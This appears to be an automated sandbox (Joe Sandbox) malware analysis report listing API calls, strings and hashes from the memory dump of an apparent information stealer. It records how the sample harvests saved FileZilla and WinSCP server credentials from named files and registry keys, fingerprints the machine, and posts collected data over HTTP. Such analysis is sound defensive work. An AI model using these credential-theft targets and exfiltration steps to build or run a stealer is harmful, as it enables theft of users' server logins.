------, xrefs: 0008589D
ERROR, xrefs: 00085D79
--, xrefs: 00085600
------, xrefs: 00085B5D
", xrefs: 00085C35
file_data, xrefs: 00085C09
------, xrefs: 00085605

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-3389637935
Opcode ID: c34cabecb15d8d83aa381d99d74bf76291e597ce7b81a57b96fee737faf71cca
Instruction ID: caa849735064dd546b62c1b4821b2f94ad732d048d481a0a54c7b9de02ae610e
Opcode Fuzzy Hash: c34cabecb15d8d83aa381d99d74bf76291e597ce7b81a57b96fee737faf71cca
Instruction Fuzzy Hash: BF42B231D511699FDF21BB20DC45ADDB3F8BF44300F4585E1A998B7122DB70AE8AAF90

Function 0008E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Part of subcall function 00091E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00096931,?), ref: 00091E37

strtok_s.MSVCRT ref: 0008E77E
GetProcessHeap.KERNEL32(00000000,000F423F,000B6912,000B690F,000B690E,000B690D), ref: 0008E7C4
HeapAlloc.KERNEL32(00000000), ref: 0008E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0008E7DF
lstrlenA.KERNEL32(00000000), ref: 0008E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0008E81E
lstrlenA.KERNEL32(00000000), ref: 0008E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0008E857
lstrlenA.KERNEL32(00000000), ref: 0008E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0008E890
lstrlenA.KERNEL32(00000000), ref: 0008E89B
lstrlenA.KERNEL32(?), ref: 0008E901
lstrlenA.KERNEL32(?), ref: 0008E915
lstrlenA.KERNEL32(0008ECBC), ref: 0008EA3D

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

Strings

Soft: FileZilla, xrefs: 0008E948
<Host>, xrefs: 0008E7D9
<User>, xrefs: 0008E851
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0008E71F
Host: , xrefs: 0008E954
Password: , xrefs: 0008E9AE
Login: , xrefs: 0008E98C
passwords.txt, xrefs: 0008EA4D
<Pass encoding="base64">, xrefs: 0008E88A
<Port>, xrefs: 0008E818

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: 6d166061ab1d0c3e93675479fd79a86d2e7d642175e22fd12744545d4a48a133
Instruction ID: 5545d4249a5095827ffe3e330397b86294ef89c570b24a9fcec71eea36d8a5fa
Opcode Fuzzy Hash: 6d166061ab1d0c3e93675479fd79a86d2e7d642175e22fd12744545d4a48a133
Instruction Fuzzy Hash: D9A14E32D41219AFCF01BBA0EC4A9DE7BB8FF14700F514461F655BB062DB74AE069B91

Function 0008E186 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 0008E1B7
_memset.LIBCMT ref: 0008E1D7
_memset.LIBCMT ref: 0008E1E8
_memset.LIBCMT ref: 0008E1F9
RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E22D
RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0008E25E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E276
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E29D
RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0008E2BD
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0008E2E0
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,000B68E7), ref: 0008E379
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0008E3D9

Strings

UserName, xrefs: 0008E496
Password: , xrefs: 0008E529
Host: , xrefs: 0008E32A
HostName, xrefs: 0008E367
PortNumber, xrefs: 0008E3BD
Soft: WinSCP, xrefs: 0008E2FE
:22, xrefs: 0008E42D
Password, xrefs: 0008E515
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0008E20B
Login: , xrefs: 0008E459
passwords.txt, xrefs: 0008E662
Security, xrefs: 0008E253
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 0008E2B3
UseMasterPassword, xrefs: 0008E24E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _memset$Value$CloseOpen$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 463713726-2798830873
Opcode ID: f63930bed6a086b786caccea364bb3087ec4628c51e418244d5258b2489f800e
Instruction ID: dbe8cc4dd737bbac32faa4cc1b26ad1f5931c149197dee9eb5bb57d8eb26f3e6
Opcode Fuzzy Hash: f63930bed6a086b786caccea364bb3087ec4628c51e418244d5258b2489f800e
Instruction Fuzzy Hash: 92D1B47191012DAEDF21EB90DC41ADAB7B8BF44304F4144E7AA48B6052EB707F89DFA1

Function 00085F39 Relevance: 53.0, APIs: 20, Strings: 10, Instructions: 466
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
Part of subcall function 00084AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
Part of subcall function 00084AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
Part of subcall function 00084AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00085FD8
StrCmpCA.SHLWAPI(?), ref: 00085FF6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0008618E
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000861D2
lstrlenA.KERNEL32(?,",mode,000B78D8,------,000B78CC,2ee1445fc63bc20d0e7966867b13e0e1,",build_id,000B78B4,------,000B78A8,",000B789C,------), ref: 000865FD
lstrlenA.KERNEL32(?), ref: 0008660C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00086617
HeapAlloc.KERNEL32(00000000), ref: 0008661E
lstrlenA.KERNEL32(?), ref: 0008662B
_memmove.LIBCMT ref: 00086639
lstrlenA.KERNEL32(?), ref: 00086647
lstrlenA.KERNEL32(?,?,00000000), ref: 00086655
_memmove.LIBCMT ref: 00086662
lstrlenA.KERNEL32(?,?,00000000), ref: 00086677
HttpSendRequestA.WININET(00000000,?,00000000), ref: 00086685
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000866E2
InternetCloseHandle.WININET(00000000), ref: 000866ED
InternetCloseHandle.WININET(?), ref: 000866F9
InternetCloseHandle.WININET(?), ref: 00086705
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00086200

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Strings

------, xrefs: 000864C9
", xrefs: 000862E5
", xrefs: 00086445
------, xrefs: 00086080
mode, xrefs: 00086575
", xrefs: 000865A1
build_id, xrefs: 00086419
------, xrefs: 00086206
------, xrefs: 00086367
2ee1445fc63bc20d0e7966867b13e0e1, xrefs: 00086471

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$------$------$------$------$2ee1445fc63bc20d0e7966867b13e0e1$build_id$mode
API String ID: 3702379033-116134722
Opcode ID: daccd31ddbed9649829dd4deb91447a79e24223a5d8ed95554f7626ce5d639ed
Instruction ID: 48397c864b8a7bd4293d65f051b0b8ab7bd622c1754c77a08bb4a30e47e6eceb
Opcode Fuzzy Hash: daccd31ddbed9649829dd4deb91447a79e24223a5d8ed95554f7626ce5d639ed
Instruction Fuzzy Hash: CD2281319401699FDF61EB60DC46BCDB7B4BF04300F4184E2AA5DB7162DB706E9A9FA0

Function 00098643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00098684
GetProcAddress.KERNEL32 ref: 0009869B
GetProcAddress.KERNEL32 ref: 000986B2
GetProcAddress.KERNEL32 ref: 000986C9
GetProcAddress.KERNEL32 ref: 000986E0
GetProcAddress.KERNEL32 ref: 000986F7
GetProcAddress.KERNEL32 ref: 0009870E
GetProcAddress.KERNEL32 ref: 00098725
GetProcAddress.KERNEL32 ref: 0009873C
GetProcAddress.KERNEL32 ref: 00098753
GetProcAddress.KERNEL32 ref: 0009876A
GetProcAddress.KERNEL32 ref: 00098781
GetProcAddress.KERNEL32 ref: 00098798
GetProcAddress.KERNEL32 ref: 000987AF
GetProcAddress.KERNEL32 ref: 000987C6
GetProcAddress.KERNEL32 ref: 000987DD
GetProcAddress.KERNEL32 ref: 000987F4
GetProcAddress.KERNEL32 ref: 0009880B
GetProcAddress.KERNEL32 ref: 00098822
GetProcAddress.KERNEL32 ref: 00098839
LoadLibraryA.KERNEL32(?,000984C2), ref: 0009884A
LoadLibraryA.KERNEL32(?,000984C2), ref: 0009885B
LoadLibraryA.KERNEL32(?,000984C2), ref: 0009886C
LoadLibraryA.KERNEL32(?,000984C2), ref: 0009887D
LoadLibraryA.KERNEL32(?,000984C2), ref: 0009888E
GetProcAddress.KERNEL32(75070000,000984C2), ref: 000988AA
GetProcAddress.KERNEL32(75FD0000,000984C2), ref: 000988C5
GetProcAddress.KERNEL32 ref: 000988DC
GetProcAddress.KERNEL32(75A50000,000984C2), ref: 000988F7
GetProcAddress.KERNEL32(74E50000,000984C2), ref: 00098912
GetProcAddress.KERNEL32(76E80000,000984C2), ref: 0009892D
GetProcAddress.KERNEL32 ref: 00098944

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 89acabbd3b3bcb9142fb71c04d250c140a1b1952869b262fdfeb15452caf4f24
Instruction ID: 7fc9444e3e39070cd6b613c3842017aa43c6e4b26b5726e7b612fb1178cb9d58
Opcode Fuzzy Hash: 89acabbd3b3bcb9142fb71c04d250c140a1b1952869b262fdfeb15452caf4f24
Instruction Fuzzy Hash: 1671F575C03212AFEF42BF60FD5C9243BA6F7487853528427E9019A2B0EB324C64EF65

Function 00093B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00090CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000B65B6,?,?,?), ref: 00090CD8
Part of subcall function 00090CC0: HeapAlloc.KERNEL32(00000000), ref: 00090CDF
Part of subcall function 00090CC0: GetLocalTime.KERNEL32(?), ref: 00090CEB
Part of subcall function 00090CC0: wsprintfA.USER32 ref: 00090D16

Part of subcall function 000915D4: _memset.LIBCMT ref: 00091607
Part of subcall function 000915D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00091626
Part of subcall function 000915D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0009164B
Part of subcall function 000915D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00091657
Part of subcall function 000915D4: CharToOemA.USER32(?,?), ref: 0009166B

Part of subcall function 00091684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0009169F
Part of subcall function 00091684: _memset.LIBCMT ref: 000916CE
Part of subcall function 00091684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000916F6
Part of subcall function 00091684: lstrcatA.KERNEL32(?,000B6ECC,?,?,?,?,?), ref: 00091713

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 000909A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000909D5
Part of subcall function 000909A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00090A15
Part of subcall function 000909A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00090A6A
Part of subcall function 000909A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00090A71

GetCurrentProcessId.KERNEL32(Path: ,000B687C,HWID: ,000B6870,GUID: ,000B6864,00000000,MachineID: ,000B6854,00000000,Date: ,000B6848,000B6844,000B79AC,Version: ,000B65B6), ref: 00093DDB

Part of subcall function 0009224A: OpenProcess.KERNEL32(00000410,00000000,=,00000000,?), ref: 0009226C
Part of subcall function 0009224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00092287
Part of subcall function 0009224A: CloseHandle.KERNEL32(00000000), ref: 0009228E

Part of subcall function 00090B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B44
Part of subcall function 00090B30: HeapAlloc.KERNEL32(00000000,?,?,?,00093E95,Windows: ,000B68A0), ref: 00090B4B

Part of subcall function 00091807: __EH_prolog3_catch_GS.LIBCMT ref: 0009180E
Part of subcall function 00091807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00093EF9,Install Date: ,000B68B0,00000000,Windows: ,000B68A0,Work Dir: In memory,000B6888), ref: 0009181F
Part of subcall function 00091807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00091830
Part of subcall function 00091807: CoCreateInstance.OLE32(000B2F00,00000000,00000001,000B2E30,?), ref: 0009184A
Part of subcall function 00091807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00091880
Part of subcall function 00091807: VariantInit.OLEAUT32(?), ref: 000918DB

Part of subcall function 00091997: __EH_prolog3_catch.LIBCMT ref: 0009199E
